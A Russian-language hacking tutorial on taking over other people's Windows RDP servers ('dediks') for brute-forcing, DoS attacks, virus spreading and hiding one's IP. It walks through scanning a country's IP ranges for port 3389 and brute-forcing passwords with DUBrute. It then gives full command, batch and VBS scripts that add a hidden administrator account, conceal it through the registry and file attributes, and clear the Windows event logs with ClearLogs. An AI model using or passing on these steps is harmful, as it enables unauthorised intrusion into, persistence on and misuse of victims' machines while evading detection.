В статье будет описываться как добыть дедик(удалённый рабочий стол),как создать на нём учётную запись и не большие инструкции чего не стоит и наоборот делать чтоб дедик не спалили и не удалили учётную записи на нём.
Что такое Дедик:
Дедик проще говоря это - Удалённый рабочий стол,позволяющий работать удалённо.(так в общих чертах)
RDP (англ. Remote Desktop Protocol — протокол удалённого рабочего стола) — протокол прикладного уровня, разработанный Microsoft, использующийся для обеспечения удалённой работы пользователя с сервером, на котором запущен сервис терминальных подключений. Клиенты существуют практически для всех версий Windows (включая Windows CE и Mobile), Linux, FreeBSD, Mac OS X, Android, Symbian. По умолчанию используется порт TCP 3389. Официальное название Майкрософт для клиентского ПО — Remote Desktop Connection или Terminal Services Client (TSC), в частности, клиент в Windows 2k/XP/2003/Vista/2008/7 называется mstsc.exe.
Особенности:
Поддержка 32-битного цвета (в дополнение к 8-, 15-, 16-, и 24-битному в предыдущих версиях);
128-битовое шифрование, используя алгоритм шифрования RC4 (значение безопасности по умолчанию; старые клиенты могут использовать более слабое шифрование). Но из-за уязвимости «man-in-the-middle vulnerability» в версиях ранее 6.0 во многих случаях трафик может быть расшифрован по пути;
Поддержка Transport Layer Security;
Звук с удалённого ПК переадресовывается и воспроизводится на локальном компьютере;
Позволяет подключать локальные ресурсы к удалённой машине (mapping);
Позволяет использовать локальный или сетевой принтеры на удалённом ПК;
Позволяет приложениям, выполняющимся в пределах текущего сеанса, обращаться к локальным последовательным и параллельным портам;
Можно обмениваться информацией через буфер обмена.
В Windows Server 2008 и Windows Vista используется новая версия протокола, RDP 6.
Так как RDP по умолчанию создаёт виртуальные консоли, то для подключения не к ним, а непосредственно к консоли 0 (основная консоль-мышь/клавиатура) нужно запустить RDP-клиент с параметром console.
Для чего он нужен:
Дедики используют для того чтоб не напрягать свой комп,допустим при бруте,ведь дедики включены месяцами без перерыва,а брут может занимать очень долгое время.
Так же может использоваться и при других процесса ёмких задачах,допустим при досс атаках,для распространения вирусов,для скрытие собственного IP адреса,вообщем много для чего.
Где взять Дедик:
В данный момент,довольно много разных ресурсов где можно взять деик бесплатно,или во все купить.
Но те дедики которые в свободном распространении,давным давно уже заюзаны и большая часть из них уже мертва,что по части купить,тоже самое ведь ни кто не знает скольким людям достался тот или иной дедик
Так что лучше всего его сбрутить самим.
Для брута нам потребуется сканер портов и сам брут,который будет тупа подбирать пароли к ним.
К примеру возьмём VNC-Scaner GUI 1.2 (скачать) и DUBrute v2.0 RC2 (скачать)
И так запускаем VNC-Scaner GUI 1.2 и выбираем диапазон страны страны,в которой нам нужно заполучить дедик:
Нажимаем кнопку "Get dialp list":
И появляется список диапазонов выбранной страны,можете оставить весь список,а можете не много сократить его,тем самым ускорить процесс.
Тыкаем кнопку "Start scan"
И процесс сканирование на наличие компов с открытым портом "3389" начинался.
После сканирования все IP адреса с открытым "3389" портом сохранятся в VNC_bypauth.txt,останется только выбрать от туда список IP адресов(можете нажать сочетание клавиш ctrl+H и в поле что вставить "3389",а поле на что оставить пустым,после чего нажать кнопку заменить.Тем самым вы не много сократите себе работу очистки списка адресов).
Далее врубаем DUBrute v2.0 RC2 и нажимаем кнопку "Generation":
Вылезет окошко,в котором указываем путь к списку ip адресов,списку логинов,к списку паролей и нажимаем кнопку "Make":
С генерируется source.txt,теперь жмякаем кнопку "Config":
Создаём текстовые файлы good.txt(сюда будут записываться сбрученые дедики) и bad.txt(сюда будут записываться неудачные подключение и прочие,в общем ошибки),указываем к ним путь и нажимаем кнопку "ok" :
Далее:
И процесс брута начался....
После того как процесс брута закончится,в текстовом файле good.txt будут находится сбрученые деды,примерно вот такого вида 78.83.175.217@administrator;123456789
Где 78.83.175.217 это ip адрес,administrator логин,а 123456789 пароль.
Теперь можно конектится
Лезем "Пуск > Все программы > Стандартные > Подключение к удаленному рабочему столу"
Далее:
И попадаем на удалённый рабочий стол(дедик) где нужно указать логин и пароль для авторизации
После чего первым делом создаём свою учетную запись.
Создаём учётную запись
На удалённом рабочем столе лезем " Пуск > Все программы > Стандартные > Командная строка" и вводим туда следующие :
net user sys pass /add net localgroup Administrators sys /add net localgroup "Remote Desktop Users" sys /add net accounts /maxpwage:unlimited
Не много расшифрую .
Строка "net user sys pass /add" добавляет нового пользователя с именем sys и паролем pass.
строка "net localgroup Administrators sys /add" добавляет пользователя sys в группу Администраторы.
"net localgroup "Remote Desktop Users" sys /add" тоже добавляет в группу и даёт возможность конекта через удалённый рабочий стол.
"net accounts /maxpwage:unlimited" позволяет избежать истечения срока действия пароля (14 дней)
Если кавыряете русскоязычный дед,значить группы будут указываться на русском языке,чтоб просмотреть нужные группы,просто введите в командной строке net localgroup.
Прячем свою учётную запись
Далее нам надо скрыть учётку от посторонних глаз,чтоб её не было видно среди других учётных записей,для этого лезем в реестр,опять "Пуск > Все программы > Стандартные > Выполнить"
Вводим туда regedit и открывается редактор реестра,лезем "HKEY_LOCAL_MACHINEHKEY_LOCAL_MACHINE > SOFTWARE > Microsoft Windows NT > CurrentVersion > Winlogon > SpecialAccounts > UserList"
И создаём там новый параметр DWORD (правой кнопкой мыши,новый параметр DWORD) Называем этот параметр именем твоего аккаунта который создавал в командной строке(в данном случае это sys,и присваиваем ему численное значение 0 ( по умолчанию оно и будет стоять).
Далее выходим и заходим под своей учетной записью которую создали,создаём текстовый файл(где угодно) и пишем туда :
attrib +a +s +r +h "C:\Documents and Settings\sys"
Сохраняем как 1.bat запускаем и удаляем.
Если будете создавать учётку с другим именем соответственно и sys везде в том числе и в батинки,смените на своё.
Если хотите немного автоматизировать весь процесс создание учётной записи,можете создать на своём компе батинок с вот таким содержанием:
echo Add an account "ЛОГИН" with a Password "ПАРОЛЬ" Set AdmGroupSID=S-1-5-32-544 Set AdmGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%AdmGroupSID%'" Get Name /Value ^| Find "="`) Do Set AdmGroup=%%J Set AdmGroup=%AdmGroup:~0,-1% echo Adding to our account in "Administrators" group net user ЛОГИН ПАРОЛЬ /add net localgroup %AdmGroup% ЛОГИН /add Set RDPGroupSID=S-1-5-32-555 Set RDPGroup= For /F "UseBackQ Tokens=1* Delims==" %%I In (`WMIC Group Where "SID = '%RDPGroupSID%'" Get Name /Value ^| Find "="`) Do Set RDPGroup=%%J Set RDPGroup=%RDPGroup:~0,-1% echo Adding to our account in "Remote desktop users" group net localgroup "%RDPGroup%" ЛОГИН /add echo Remove password expiration net accounts /maxpwage:unlimited echo If the folder does not exist yet, create it mkdir "C:\Documents and Settings\ЛОГИН" echo And put on her attribute "system" attrib +s +a +r +h "C:\Documents and Settings\ЛОГИН" echo Hide the account from the Winlogon reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v ЛОГИН /t REG_DWORD /d 0 /f
естественно заменив слова ЛОГИН и ПАРОЛЬ на свои данные,сохранить с расширением bat и залить на любой Ф.О.(Файлообменник),допустим на slil.ru,а когда уже попали на дедик,скачать его с браузера и запустить,в принципе так и весь софт который понадобится на дедике,закачивается через браузер,или программы удалённого доступа,так же можно закачивать через FTP.
Так же можете использовать VBS скрипт:
Set objNetwork = CreateObject("WScript.Network") strComputer = objNetwork.ComputerName Set colAccounts = GetObject("WinNT://" & strComputer & "") Set objUser = colAccounts.Create("user", "Логин") objUser.SetPassword "Пароль" objUser.SetInfo Set objGroup = GetObject("WinNT://" & strComputer & "/Администраторы,group") Set objUser = GetObject("WinNT://" & strComputer & "/Логин,user") objGroup.Add(objUser.ADsPath) Const ADS_UF_DONT_EXPIRE_PASSWD = &h10000 UserFlags = objUser.Get("UserFlags") objPasswordExpirationFlag = UserFlags OR ADS_UF_DONT_EXPIRE_PASSWD objUser.Put "userFlags", objPasswordExpirationFlag objUser.SetInfo
Так же заменить Логин и пароль на свои.
Теперь не большие правила которым следует придерживаться чтоб не спалить свою учётку.:
1) Ни когда ни чего не удаляйте,разумеется кроме тех файлов которые сами туда закачали.
2)Ни когда ни чего не оставляйте на рабочем столе,даже если работаете под своей учёткой.
3)Всегда прячьте свои файлы как можно глубже( например в папке system32 )
Чистим логи(следы прибывания)
Для того чтоб удалить следы своего прибывания лезем в меню пуск
"Пуск > Все программы > Выполнить"
Вводим eventvwr и клацаем кнопку ok
Далее переходим Безопасность и чтоб не кавырятся среди кучи логов идем в меню Вид > Фильтр ,там в код события вставляем 683 или 682 и клачаем ok
Вот теперь ищем свои следы и удаляем их,или же можете автоматизировать весь процесс,опять же написав небольшой батинок и скачав на дедик ClearLogs 1.0 (скачать)
Сам батинок:
@echo off ping -n 30 yandex.ru "clearlogs.exe" C:\clearlogs.exe -sys C:\clearlogs.exe -app C:\clearlogs.exe -sec del "C:\clearlogs.exe" >nul del "C:\1.bat" >nul
Кидаем сам ClearLogs 1.0 вместе с батинком в корень диска C:\ и перед выход запускаем.
Спасибо за внимание,всего доброго!